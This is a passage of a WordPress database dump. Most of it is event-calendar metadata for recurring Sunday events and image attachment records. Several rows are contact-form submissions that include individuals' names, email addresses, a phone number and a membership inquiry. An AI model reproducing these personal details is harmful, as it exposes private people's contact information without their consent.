Lord!\n\n\n'),(138085,264613,'_form_id','13'),(138086,264613,'_seq_num','68'),(138088,264615,'protect_children',''),(138089,264615,'_edit_lock','1619287309:2'),(138090,264615,'_edit_last','2'),(138092,264615,'mec_color',''),(138093,264615,'mec_location_id','118'),(138094,264615,'mec_dont_show_map','0'),(138095,264615,'mec_organizer_id','1'),(138096,264615,'mec_read_more',''),(138097,264615,'mec_more_info',''),(138098,264615,'mec_more_info_title',''),(138099,264615,'mec_more_info_target','_self'),(138100,264615,'mec_cost',''),(138101,264615,'mec_currency','a:0:{}'),(138102,264615,'mec_additional_organizer_ids','a:0:{}'),(138103,264615,'mec_additional_location_ids','a:0:{}'),(138104,264615,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-02\";s:4:\"hour\";s:1:\"9\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-02\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"15\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/03/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(138105,264615,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/03/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(138106,264615,'mec_certain_weekdays','a:0:{}'),(138107,264615,'mec_allday','0'),(138108,264615,'one_occurrence','0'),(138109,264615,'mec_hide_time','0'),(138110,264615,'mec_hide_end_time','0'),(138111,264615,'mec_comment',''),(138112,264615,'mec_timezone','global'),(138113,264615,'mec_countdown_method','global'),(138114,264615,'mec_public','1'),(138115,264615,'mec_start_date','2021-05-02'),(138116,264615,'mec_start_time_hour','9'),(138117,264615,'mec_start_time_minutes','0'),(138118,264615,'mec_start_time_ampm','AM'),(138119,264615,'mec_start_day_seconds','32400'),(138120,264615,'mec_end_date','2021-05-02'),(138121,264615,'mec_end_time_hour','10'),(138122,264615,'mec_end_time_minutes','15'),(138123,264615,'mec_end_time_ampm','AM'),(138124,264615,'mec_end_day_seconds','36900'),(138125,264615,'mec_repeat_status','1'),(138126,264615,'mec_repeat_type','advanced'),(138127,264615,'mec_repeat_interval','1'),(138128,264615,'mec_repeat_end','date'),(138129,264615,'mec_repeat_end_at_occurrences','9'),(138130,264615,'mec_repeat_end_at_date','2021-10-03'),(138131,264615,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.1\";}'),(138132,264615,'mec_in_days',''),(138133,264615,'mec_not_in_days',''),(138134,264615,'mec_hourly_schedules','a:0:{}'),(138135,264615,'mec_booking','a:0:{}'),(138136,264615,'mec_tickets','a:0:{}'),(138137,264615,'mec_fees_global_inheritance','1'),(138138,264615,'mec_fees','a:0:{}'),(138139,264615,'mec_ticket_variations_global_inheritance','1'),(138140,264615,'mec_ticket_variations','a:0:{}'),(138141,264615,'mec_reg_fields_global_inheritance','1'),(138142,264615,'mec_reg_fields','a:0:{}'),(138143,264615,'mec_bfixed_fields','a:0:{}'),(138144,264615,'mec_op','a:0:{}'),(138145,264615,'mec_fields','a:0:{}'),(138146,264615,'mec_event_status','EventScheduled'),(138147,264615,'mec_moved_online_link',''),(138148,264615,'mec_cancelled_reason',''),(138149,264615,'mec_display_cancellation_reason_in_single_page',''),(138150,264615,'boldgrid_hide_page_title','0'),(138151,264617,'protect_children',''),(138152,264617,'protect_children',''),(138153,264617,'_edit_lock','1619287255:2'),(138154,264617,'_edit_last','2'),(151769,266078,'mec_ticket_variations','a:0:{}'),(138156,264617,'mec_color',''),(138157,264617,'mec_location_id','118'),(138158,264617,'mec_dont_show_map','0'),(138159,264617,'mec_organizer_id','1'),(138160,264617,'mec_read_more',''),(138161,264617,'mec_more_info',''),(138162,264617,'mec_more_info_title',''),(138163,264617,'mec_more_info_target','_self'),(138164,264617,'mec_cost',''),(138165,264617,'mec_currency','a:0:{}'),(138166,264617,'mec_additional_organizer_ids','a:0:{}'),(138167,264617,'mec_additional_location_ids','a:0:{}'),(138168,264617,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-02\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-02\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/03/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(138169,264617,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.1\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/03/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(138170,264617,'mec_certain_weekdays','a:0:{}'),(138171,264617,'mec_allday','0'),(138172,264617,'one_occurrence','0'),(138173,264617,'mec_hide_time','0'),(138174,264617,'mec_hide_end_time','0'),(138175,264617,'mec_comment',''),(138176,264617,'mec_timezone','global'),(138177,264617,'mec_countdown_method','global'),(138178,264617,'mec_public','1'),(138179,264617,'mec_start_date','2021-05-02'),(138180,264617,'mec_start_time_hour','11'),(138181,264617,'mec_start_time_minutes','30'),(138182,264617,'mec_start_time_ampm','AM'),(138183,264617,'mec_start_day_seconds','41400'),(138184,264617,'mec_end_date','2021-05-02'),(138185,264617,'mec_end_time_hour','12'),(138186,264617,'mec_end_time_minutes','45'),(138187,264617,'mec_end_time_ampm','PM'),(138188,264617,'mec_end_day_seconds','45900'),(138189,264617,'mec_repeat_status','1'),(138190,264617,'mec_repeat_type','advanced'),(138191,264617,'mec_repeat_interval','1'),(138192,264617,'mec_repeat_end','date'),(138193,264617,'mec_repeat_end_at_occurrences','9'),(138194,264617,'mec_repeat_end_at_date','2021-10-03'),(138195,264617,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.1\";}'),(138196,264617,'mec_in_days',''),(138197,264617,'mec_not_in_days',''),(138198,264617,'mec_hourly_schedules','a:0:{}'),(138199,264617,'mec_booking','a:0:{}'),(138200,264617,'mec_tickets','a:0:{}'),(138201,264617,'mec_fees_global_inheritance','1'),(138202,264617,'mec_fees','a:0:{}'),(138203,264617,'mec_ticket_variations_global_inheritance','1'),(138204,264617,'mec_ticket_variations','a:0:{}'),(138205,264617,'mec_reg_fields_global_inheritance','1'),(138206,264617,'mec_reg_fields','a:0:{}'),(138207,264617,'mec_bfixed_fields','a:0:{}'),(138208,264617,'mec_op','a:0:{}'),(138209,264617,'mec_fields','a:0:{}'),(138210,264617,'mec_event_status','EventScheduled'),(138211,264617,'mec_moved_online_link',''),(138212,264617,'mec_cancelled_reason',''),(138213,264617,'mec_display_cancellation_reason_in_single_page',''),(138214,264617,'boldgrid_hide_page_title','0'),(138215,264618,'protect_children',''),(138216,264618,'protect_children',''),(138217,264618,'_edit_lock','1619287917:2'),(138218,264618,'_edit_last','2'),(138220,264618,'mec_color',''),(138221,264618,'mec_location_id','118'),(138222,264618,'mec_dont_show_map','0'),(138223,264618,'mec_organizer_id','1'),(138224,264618,'mec_read_more',''),(138225,264618,'mec_more_info',''),(138226,264618,'mec_more_info_title',''),(138227,264618,'mec_more_info_target','_self'),(138228,264618,'mec_cost',''),(138229,264618,'mec_currency','a:0:{}'),(138230,264618,'mec_additional_organizer_ids','a:0:{}'),(138231,264618,'mec_additional_location_ids','a:0:{}'),(138232,264618,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-09\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-09\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/10/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(138233,264618,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/10/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(138234,264618,'mec_certain_weekdays','a:0:{}'),(138235,264618,'mec_allday','0'),(138236,264618,'one_occurrence','0'),(138237,264618,'mec_hide_time','0'),(138238,264618,'mec_hide_end_time','0'),(138239,264618,'mec_comment',''),(138240,264618,'mec_timezone','global'),(138241,264618,'mec_countdown_method','global'),(138242,264618,'mec_public','1'),(138243,264618,'mec_start_date','2021-05-09'),(138244,264618,'mec_start_time_hour','8'),(138245,264618,'mec_start_time_minutes','45'),(138246,264618,'mec_start_time_ampm','AM'),(138247,264618,'mec_start_day_seconds','31500'),(138248,264618,'mec_end_date','2021-05-09'),(138249,264618,'mec_end_time_hour','10'),(138250,264618,'mec_end_time_minutes','0'),(138251,264618,'mec_end_time_ampm','AM'),(138252,264618,'mec_end_day_seconds','36000'),(138253,264618,'mec_repeat_status','1'),(138254,264618,'mec_repeat_type','advanced'),(138255,264618,'mec_repeat_interval','1'),(138256,264618,'mec_repeat_end','date'),(138257,264618,'mec_repeat_end_at_occurrences','9'),(138258,264618,'mec_repeat_end_at_date','2021-10-10'),(138259,264618,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.2\";}'),(138260,264618,'mec_in_days',''),(138261,264618,'mec_not_in_days',''),(138262,264618,'mec_hourly_schedules','a:0:{}'),(138263,264618,'mec_booking','a:0:{}'),(138264,264618,'mec_tickets','a:0:{}'),(138265,264618,'mec_fees_global_inheritance','1'),(138266,264618,'mec_fees','a:0:{}'),(138267,264618,'mec_ticket_variations_global_inheritance','1'),(138268,264618,'mec_ticket_variations','a:0:{}'),(138269,264618,'mec_reg_fields_global_inheritance','1'),(138270,264618,'mec_reg_fields','a:0:{}'),(138271,264618,'mec_bfixed_fields','a:0:{}'),(138272,264618,'mec_op','a:0:{}'),(138273,264618,'mec_fields','a:0:{}'),(138274,264618,'mec_event_status','EventScheduled'),(138275,264618,'mec_moved_online_link',''),(138276,264618,'mec_cancelled_reason',''),(138277,264618,'mec_display_cancellation_reason_in_single_page',''),(138278,264618,'boldgrid_hide_page_title','0'),(152048,266103,'mec_start_time_hour','1'),(152047,266103,'mec_start_date','2022-02-19'),(152046,266103,'mec_public','1'),(151768,266078,'mec_ticket_variations_global_inheritance','1'),(152045,266103,'mec_countdown_method','global'),(152044,266103,'mec_timezone','global'),(152043,266103,'mec_comment',''),(152042,266103,'mec_hide_end_time','0'),(152041,266103,'mec_hide_time','0'),(152040,266103,'one_occurrence','0'),(152039,266103,'mec_allday','0'),(152004,7162,'_bgppb_default_editor','bgppb'),(152003,266095,'_seq_num','93'),(151998,266095,'_field_134','IBRAHIM'),(151999,266095,'_field_135','honorablelingoibrahim56@gmail.com'),(152000,266095,'_field_137','Information pour devenir membre '),(152001,266095,'_field_138','Dear\nAm from Congo Kinshasa   I need to come member  of eckankar  please if you can give me full information  thanks my number +243998885577\nHon ibrahim lingo'),(152002,266095,'_form_id','13'),(151997,266095,'_field_133','Lingo  ngbandani'),(152038,266103,'mec_certain_weekdays','a:0:{}'),(152037,266103,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(152007,266098,'_field_404','richardthe@bell.net'),(152008,266098,'_form_id','44'),(152009,266098,'_seq_num','20'),(152010,266099,'_field_474','Richard '),(152011,266099,'_field_475','Thériault'),(152012,266099,'_field_476','richardthe@bell.net'),(152013,266099,'_form_id','51'),(152014,266099,'_seq_num','7'),(151938,266084,'_edit_last','2'),(151937,266084,'_edit_lock','1639676487:2'),(151935,266084,'_thumbnail_id','266079'),(151936,266084,'_dp_original','266078'),(151933,266084,'passster_protection_type','password'),(151932,266084,'passster_activate_protection',NULL),(151931,266084,'passster_activate_global_protection',NULL),(138343,264623,'protect_children',''),(138344,264623,'protect_children',''),(138345,264623,'mec_color',''),(138346,264623,'mec_location_id','118'),(138347,264623,'mec_dont_show_map','0'),(138348,264623,'mec_organizer_id','1'),(138349,264623,'mec_start_date','2021-07-11'),(138350,264623,'mec_start_time_hour','10'),(138351,264623,'mec_start_time_minutes','30'),(138352,264623,'mec_start_time_ampm','AM'),(138353,264623,'mec_start_day_seconds','37800'),(138354,264623,'mec_end_date','2021-07-11'),(138355,264623,'mec_end_time_hour','11'),(138356,264623,'mec_end_time_minutes','30'),(138357,264623,'mec_end_time_ampm','AM'),(138358,264623,'mec_end_day_seconds','41400'),(138359,264623,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-07-11\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-07-11\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(138360,264623,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(138361,264623,'mec_certain_weekdays','a:0:{}'),(138362,264623,'mec_allday','0'),(138363,264623,'mec_hide_time','0'),(138364,264623,'mec_hide_end_time','0'),(138365,264623,'mec_comment',''),(138366,264623,'mec_repeat_status','0'),(138367,264623,'mec_repeat_type',''),(138368,264623,'mec_repeat_interval','1'),(138369,264623,'mec_repeat_end',''),(138370,264623,'mec_repeat_end_at_occurrences',''),(138371,264623,'mec_repeat_end_at_date',''),(138372,264623,'mec_advanced_days','a:0:{}'),(138373,264623,'mec_in_days',''),(138374,264623,'mec_not_in_days',''),(138375,264623,'mec_hourly_schedules','a:0:{}'),(138376,264623,'mec_booking','a:0:{}'),(138377,264623,'mec_tickets','a:0:{}'),(138378,264623,'mec_fees_global_inheritance','1'),(138379,264623,'mec_fees','a:0:{}'),(138380,264623,'mec_ticket_variations_global_inheritance','1'),(138381,264623,'mec_ticket_variations','a:0:{}'),(138382,264623,'mec_reg_fields_global_inheritance','1'),(138383,264623,'mec_reg_fields','a:0:{}'),(138384,264623,'mec_op','a:0:{}'),(138385,264623,'mec_event_date_submit','20210422105713'),(138386,264623,'_edit_lock','1623940562:2'),(138387,264623,'_edit_last','2'),(138389,264623,'mec_read_more',''),(138390,264623,'mec_more_info',''),(138391,264623,'mec_more_info_title',''),(138392,264623,'mec_more_info_target','_self'),(138393,264623,'mec_cost',''),(138394,264623,'mec_currency','a:0:{}'),(138395,264623,'mec_additional_organizer_ids','a:0:{}'),(138396,264623,'mec_additional_location_ids','a:0:{}'),(138397,264623,'one_occurrence','0'),(138398,264623,'mec_timezone','global'),(138399,264623,'mec_countdown_method','global'),(138400,264623,'mec_public','1'),(138401,264623,'mec_bfixed_fields','a:0:{}'),(138402,264623,'mec_fields','a:0:{}'),(138403,264623,'mec_event_status','EventScheduled'),(138404,264623,'mec_moved_online_link',''),(138405,264623,'mec_cancelled_reason',''),(138406,264623,'mec_display_cancellation_reason_in_single_page',''),(143532,265137,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:719;s:6:\"height\";i:385;s:4:\"file\";s:37:\"2021/06/generic-event-notext-2021.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"generic-event-notext-2021-300x161.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:161;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"generic-event-notext-2021-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:37:\"generic-event-notext-2021-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:37:\"generic-event-notext-2021-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:37:\"generic-event-notext-2021-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:37:\"generic-event-notext-2021-300x385.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"generic-event-notext-2021-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(143531,265137,'_wp_attached_file','2021/06/generic-event-notext-2021.jpg'),(143530,265136,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:720;s:6:\"height\";i:385;s:4:\"file\";s:28:\"2021/06/elss-notext-2021.jpg\";s:5:\"sizes\";a:7:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"elss-notext-2021-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"elss-notext-2021-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumblist\";a:4:{s:4:\"file\";s:28:\"elss-notext-2021-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"meccarouselthumb\";a:4:{s:4:\"file\";s:28:\"elss-notext-2021-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"gridsquare\";a:4:{s:4:\"file\";s:28:\"elss-notext-2021-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"tileview\";a:4:{s:4:\"file\";s:28:\"elss-notext-2021-300x385.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:385;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"elss-notext-2021-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(138471,264627,'protect_children',''),(138472,264627,'protect_children',''),(138473,264627,'_edit_lock','1619291887:2'),(138474,264627,'_edit_last','2'),(151767,266078,'mec_fees','a:0:{}'),(138476,264627,'mec_color',''),(138477,264627,'mec_location_id','118'),(138478,264627,'mec_dont_show_map','0'),(138479,264627,'mec_organizer_id','1'),(138480,264627,'mec_read_more',''),(138481,264627,'mec_more_info',''),(138482,264627,'mec_more_info_title',''),(138483,264627,'mec_more_info_target','_self'),(138484,264627,'mec_cost',''),(138485,264627,'mec_currency','a:0:{}'),(138486,264627,'mec_additional_organizer_ids','a:0:{}'),(138487,264627,'mec_additional_location_ids','a:0:{}'),(138488,264627,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-09\";s:4:\"hour\";s:2:\"12\";s:7:\"minutes\";s:2:\"15\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-09\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:2:\"45\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/10/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(138489,264627,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:5:\"Sun.2\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/10/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(138490,264627,'mec_certain_weekdays','a:0:{}'),(138491,264627,'mec_allday','0'),(138492,264627,'one_occurrence','0'),(138493,264627,'mec_hide_time','0'),(138494,264627,'mec_hide_end_time','0'),(138495,264627,'mec_comment',''),(138496,264627,'mec_timezone','global'),(138497,264627,'mec_countdown_method','global'),(138498,264627,'mec_public','1'),(138499,264627,'mec_start_date','2021-05-09'),(138500,264627,'mec_start_time_hour','12'),(138501,264627,'mec_start_time_minutes','15'),(138502,264627,'mec_start_time_ampm','PM'),(138503,264627,'mec_start_day_seconds','44100'),(138504,264627,'mec_end_date','2021-05-09'),(138505,264627,'mec_end_time_hour','1'),(138506,264627,'mec_end_time_minutes','45'),(138507,264627,'mec_end_time_ampm','PM'),(138508,264627,'mec_end_day_seconds','49500'),(138509,264627,'mec_repeat_status','1'),(138510,264627,'mec_repeat_type','advanced'),(138511,264627,'mec_repeat_interval','1'),(138512,264627,'mec_repeat_end','date'),(138513,264627,'mec_repeat_end_at_occurrences','9'),(138514,264627,'mec_repeat_end_at_date','2021-10-10'),(138515,264627,'mec_advanced_days','a:1:{i:0;s:5:\"Sun.2\";}'),(138516,264627,'mec_in_days',''),(138517,264627,'mec_not_in_days',''),(138518,264627,'mec_hourly_schedules','a:0:{}'),(138519,264627,'mec_booking','a:0:{}'),(138520,264627,'mec_tickets','a:0:{}'),(138521,264627,'mec_fees_global_inheritance','1'),(138522,264627,'mec_fees','a:0:{}'),(138523,264627,'mec_ticket_variations_global_inheritance','1'),(138524,264627,'mec_ticket_variations','a:0:{}'),(138525,264627,'mec_reg_fields_global_inheritance','1'),(138526,264627,'mec_reg_fields','a:0:{}'),(138527,264627,'mec_bfixed_fields','a:0:{}'),(138528,264627,'mec_op','a:0:{}'),(138529,264627,'mec_fields','a:0:{}'),(138530,264627,'mec_event_status','EventScheduled'),(138531,264627,'mec_moved_online_link',''),(138532,264627,'mec_cancelled_reason',''),(138533,264627,'mec_display_cancellation_reason_in_single_page',''),(138534,264627,'boldgrid_hide_page_title','0'),(138535,264630,'protect_children',''),(138536,264630,'protect_children',''),(138537,264630,'_edit_lock','1619291863:2'),(138538,264630,'_edit_last','2'),(138540,264630,'mec_color',''),(138541,264630,'mec_location_id','118'),(138542,264630,'mec_dont_show_map','0'),(138543,264630,'mec_organizer_id','1'),(138544,264630,'mec_read_more',''),(138545,264630,'mec_more_info',''),(138546,264630,'mec_more_info_title',''),(138547,264630,'mec_more_info_target','_self'),(138548,264630,'mec_cost',''),(138549,264630,'mec_currency','a:0:{}'),(138550,264630,'mec_additional_organizer_ids','a:0:{}'),(138551,264630,'mec_additional_location_ids','a:0:{}'),(138552,264630,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-05-16\";s:4:\"hour\";s:1:\"9\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2021-05-16\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"15\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(138553,264630,'mec_repeat','a:7:{s:6:\"status\";s:1:\"1\";s:4:\"type\";s:8:\"advanced\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:4:\"date\";s:11:\"end_at_date\";s:10:\"10/17/2021\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(138554,264630,'mec_certain_weekdays','a:0:{}'),(138555,264630,'mec_allday','0'),(138556,264630,'one_occurrence','0'),(138557,264630,'mec_hide_time','0'),(138558,264630,'mec_hide_end_time','0'),(138559,264630,'mec_comment',''),(138560,264630,'mec_timezone','global'),(138561,264630,'mec_countdown_method','global'),(138562,264630,'mec_public','1'),(138563,264630,'mec_start_date','2021-05-16'),(138564,264630,'mec_start_time_hour','9'),(138565,264630,'mec_start_time_minutes','0'),(138566,264630,'mec_start_time_ampm','AM'),(138567,264630,'mec_start_day_seconds','32400'),(138568,264630,'mec_end_date','2021-05-16'),(138569,264630,'mec_end_time_hour','10'),(138570,264630,'mec_end_time_minutes','15'),(138571,264630,'mec_end_time_ampm','AM'),(138572,264630,'mec_end_day_seconds','36900'),(138573,264630,'mec_repeat_status','1'),(138574,264630,'mec_repeat_type','advanced'),(138575,264630,'mec_repeat_interval','1'),(138576,264630,'mec_repeat_end','date'),(138577,264630,'mec_repeat_end_at_occurrences','9'),(138578,264630,'mec_repeat_end_at_date','2021-10-17'),(138579,264630,'mec_advanced_days','a:0:{}'),(138580,264630,'mec_in_days',''),(138581,264630,'mec_not_in_days',''),(138582,264630,'mec_hourly_schedules','a:0:{}'),(138583,264630,'mec_booking','a:0:{}'),(138584,264630,'mec_tickets','a:0:{}'),(138585,264630,'mec_fees_global_inheritance','1'),(138586,264630,'mec_fees','a:0:{}'),(138587,264630,'mec_ticket_variations_global_inheritance','1'),(138588,264630,'mec_ticket_variations','a:0:{}'),(138589,264630,'mec_reg_fields_global_inheritance','1'),(138590,264630,'mec_reg_fields','a:0:{}'),(138591,264630,'mec_bfixed_fields','a:0:{}'),(138592,264630,'mec_op','a:0:{}'),(138593,264630,'mec_fields','a:0:{}'),(138594,264630,'mec_event_status','EventScheduled'),(138595,264630,'mec_moved_online_link',''),(138596,264630,'mec_cancelled_reason',''),(138597,264630,'mec_display_cancellation_reason_in_single_page',''),(138598,264630,'boldgrid_hide_page_title','0'),(138599,264632,'protect_children',''),(138600,264632,'protect_children',''),(138601,264632,'_edit_lock','1636495010:2'),(138602,264632,'_edit_last','2'),(151766,266078,'mec_fees_global_inheritance','1'),(138604,264632,'mec_color',''),(138605,264632,'mec_location_id','118'),(138606,264632,'mec_dont_show_map','0'),(138607,264632,'mec_organizer_id','1'),(138608,264632,'mec_read_more',''),(138609,264632,'mec_more_info',''),(138610,264632,'mec_more_info_title',''),(138611,264632,'mec_more_info_target','_self'),(138612,264632,'mec_cost',''),(138613,264632,'mec_currency','a:0:{}'),(138614,264632,'mec_additional_organizer_ids','a:0:{}'),(138615,264632,'mec_additional_location_ids','a:0:{}'),(138616,264632,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2021-11-03\";s:4:\"hour\";s:1:\"7\";